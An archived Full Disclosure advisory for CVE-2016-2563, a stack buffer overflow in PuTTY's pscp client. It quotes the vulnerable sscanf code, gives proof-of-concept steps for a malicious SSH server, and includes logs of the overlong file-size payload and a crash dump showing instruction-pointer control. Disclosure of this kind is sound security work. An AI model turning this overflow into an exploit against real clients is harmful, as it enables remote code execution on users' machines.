Full Disclosure mailing list archives

By Date By Thread CVE-2016-2563 - PuTTY/PSCP <=0.66 buffer overflow - vuln-pscp-sink-sscanf From: "oststrom \(public\)" <pub () oststrom com>

Date: Sun, 6 Mar 2016 17:50:15 +0100

A potential addition to your honeypots. Author: <github.com/tintinweb> Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563 Version: 0.1 Date: Feb 20th, 2016 Tag: putty pscp client-side post-auth stack buffer overwrite when processing remote file size Overview -------- Name: putty Vendor: sgtatham References: * http://www.chiark.greenend.org.uk/~sgtatham/putty/ [1] Version: 0.66 [2] Latest Version: 0.66 Other Versions: 0.59 [3] (~9 years ago) <= affected <= 0.66 Platform(s): win/nix Technology: c Vuln Classes: stack buffer overwrite (CWE-121) Origin: remote Min. Privs.: post auth CVE: CVE-2016-2563 Description ----------- quote website [1] PuTTY is a free implementation of SSH and Telnet for Windows and Unix platforms, along with an xterm terminal emulator. It is written and maintained primarily by Simon Tatham. Summary ------- The putty SCP command-line utility (pscp) is missing a bounds-check for a stack buffer when processing the SCP-SINK file-size response to a SCP download request. This may allow a malicious server to overwrite the stack buffer within the client- application potentially leading to remote code execution. PoC see ref github. Patch see ref github. Besides that, two minor issues have been reported in putty packet handling: * DoS condition in the parsing of SSH-Strings that lead to a nullptr read. (connect putty to `poc.py` and type `x11exploit` to trigger one occurrence of a crash, also works with x11forwarding disabled in putty) * DoS condition in the handling of unrequested forwarded-tcpip channels open requests that lead to a nullptr read. (connect putty to `poc.py` and type `forwardedtcpipcrash` to trigger crash) Details ------- The vulnerable code is located in `pscp.c` [4] line 1498 (HEAD) and is based on an unbound `sscanf` string format descriptor storing an arbitrary length string in a 40byte fixed size stack buffer `sizestr[40]`. Inline annotations are prefixed with `//#!` 1491 /* 1492 * If we get here, we must have seen SCP_SINK_FILE or 1493 * SCP_SINK_DIR. 1494 */ 1495 { 1496 char sizestr[40]; //#! fixed size buffer 1497 1498 if (sscanf(act->buf, "%lo %s %n", &act->permissions, //#! unbound cstr %s written to sizestr 1499 sizestr, &i) != 2) Proof of Concept ---------------- Prerequisites: * install python 2.7.x * issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x * make sure `poc.py` and `test_rsa.key` are in the same folder poc: Usage: [<listen_ip:port>] Default: 0.0.0.0:22 1. start the malicious sshd by running `poc.py` which by default will bind all ips, port 22. INFO monkey-patch paramiko.Transport.open_channel INFO monkey-patch paramiko.Transport._check_banner INFO --start-- INFO ServerHostKey: 60733844cb5186657fdedaa22b5a57d5 INFO BIND: ('0.0.0.0', 22) INFO Listening for connection ... ... 2. try to retrieve any file from the malicious sshd by executing `pscp`. Provide any user/password/pubkey, the server will just accept anything. c:\> pscp.exe -scp root@localhost:/etc/passwd . root@localhost's password: anything 3. key-exchange and authentication ... INFO new peer: ('127.0.0.1', 6127) DEBUG starting thread (server mode): 0x2411750L INFO Connected (version 2.0, client PuTTY_Release_0.66) DEBUG kex algos:[u'diffie-hellman-group-exchange-sha256', u'diffie-hellman-group-exchange-sha1', u'diffie-hellman-group14-sha1', u'diffie-hellman-group1-sha1', u'rsa2048-sha256', u'rsa1024-sha1'] server key:[u'ssh-rsa', u'ssh-dss'] client encrypt:[u'aes256-ctr', u'aes256-cbc', u'rijndael-cbc () lysator liu se', u'aes192-ctr', u'aes192-cbc', u'aes128-ctr', u'aes128-cbc', u'blowfish-ctr', u'blowfish-cbc', u'3des-ctr', u'3des-cbc', u'arcfour256', u'arcfour128'] server encrypt:[u'aes256-ctr', u'aes256-cbc', u'rijndael-cbc () lysator liu se', u'aes192-ctr', u'aes192-cbc', u'aes128-ctr', u'aes128-cbc', u'blowfish-ctr', u'blowfish-cbc', u'3des-ctr', u'3des-cbc', u'arcfour256', u'arcfour128'] client mac:[u'hmac-sha2-256', u'hmac-sha1', u'hmac-sha1-96', u'hmac-md5'] server mac:[u'hmac-sha2-256', u'hmac-sha1', u'hmac-sha1-96', u'hmac-md5'] client compress:[u'none', u'zlib'] server compress:[u'none', u'zlib'] client lang:[u''] server lang:[u''] kex follows?False DEBUG Ciphers agreed: local=aes256-ctr, remote=aes256-ctr DEBUG using kex diffie-hellman-group14-sha1; server key type ssh-rsa; cipher: local aes256-ctr, remote aes256-ctr; mac: local hmac-sha1, remote hmac-sha1; compression: local none, remote none DEBUG Switch to new keys ... DEBUG Auth request (type=none) service=ssh-connection, username=root INFO Auth rejected (none). INFO REQUEST: allowed auths: gssapi-keyex,gssapi-with-mic,password,publickey DEBUG Auth request (type=gssapi-with-mic) service=ssh-connection, username=root INFO Auth rejected (gssapi-with-mic). INFO REQUEST: allowed auths: gssapi-keyex,gssapi-with-mic,password,publickey DEBUG Auth request (type=password) service=ssh-connection, username=root INFO REQUEST: CHECK_AUTH_PASS u'root' xxxxx INFO * SUCCESS INFO Auth granted (password). ... 4. `pscp` tries to retrieve file. Server responds with fake timestamps, permissions and an overly long filesize string overflowing the 40byte client buffer. ... INFO REQUEST: CHAN session 0 DEBUG [chan 0] Max packet in: 32768 bytes DEBUG [chan 0] Max packet out: 16384 bytes DEBUG Secsh channel 0 (session) opened. DEBUG [chan 0] Unhandled channel request "simple () putty projects tartarus org" INFO REQUEST: EXEC <paramiko.Channel 0 (open) window=2147483647 -> <paramiko.Transport at 0x2411750L (cipher aes256-ctr, 256 bits) (active; 1 open channel(s))>> scp -f /a INFO Authenticated! INFO wait for event INFO wait for event WARNING Oh, hello putty/pscp PuTTY_Release_0.66, nice to meet you! INFO send (time): 'T1444608444 0 1444608444 0

' INFO send (perm): 'C755 A...A

' INFO boom! ERROR Peer did not ask for a shell within 10 seconds. DEBUG EOF in transport thread ... 5. `pscp` crashes due to RET overwrite with EIP control (`\x41`==`A`). Can be turned into RCE (see annotation, EIP control) ... CONTEXT: 0000000000000000 -- (.cxr 0x0;r) eax=00000000 ebx=00000000 ecx=00187dc0 edx=00000000 esi=003f1061 edi=00000000 eip=41414141 esp=00187e18 ebp=41414141 iopl=0 nv up ei pl zr na pe nc //#! EIP control cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? ... PROCESS_NAME: pscp.exe READ_ADDRESS: 0000000041414141 FOLLOWUP_IP: unknown!noop+0 41414141 ?? ??? FAILED_INSTRUCTION_ADDRESS: unknown!noop+0 41414141 ?? ??? IP_IN_FREE_BLOCK: 41414141 BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_ZEROED_STACK_EXPL OITABLE LAST_CONTROL_TRANSFER: from 0000000041414141 to 0000000041414141 STACK_TEXT: 00187e14 41414141 41414141 41414141 41414141 0x41414141 00187e18 41414141 41414141 41414141 41414141 0x41414141 ... Notes ----- Verified, resolved and released within one week. quite impressive. Vendor response: see [5] References ---------- [1] http://www.chiark.greenend.org.uk/~sgtatham/putty/ [2] http://tartarus.org/~simon-git/gitweb/?p=putty.git [3] http://tartarus.org/~simon-git/gitweb/?p=putty.git;a=tree;h=5baaacba07aff7bd 680cf9954fee44a0c11dc968;hb=c8ac73ada6aa865ce9f4d0e389ba210072bc0b57 [4] http://tartarus.org/~simon-git/gitweb/?p=putty.git;a=blob;f=pscp.c;hb=HEAD [5] http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-pscp-sink-ss canf.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: CVE-2016-2563 - PuTTY/PSCP <=0.66 buffer overflow - vuln-pscp-sink-sscanf oststrom (public) (Mar 09)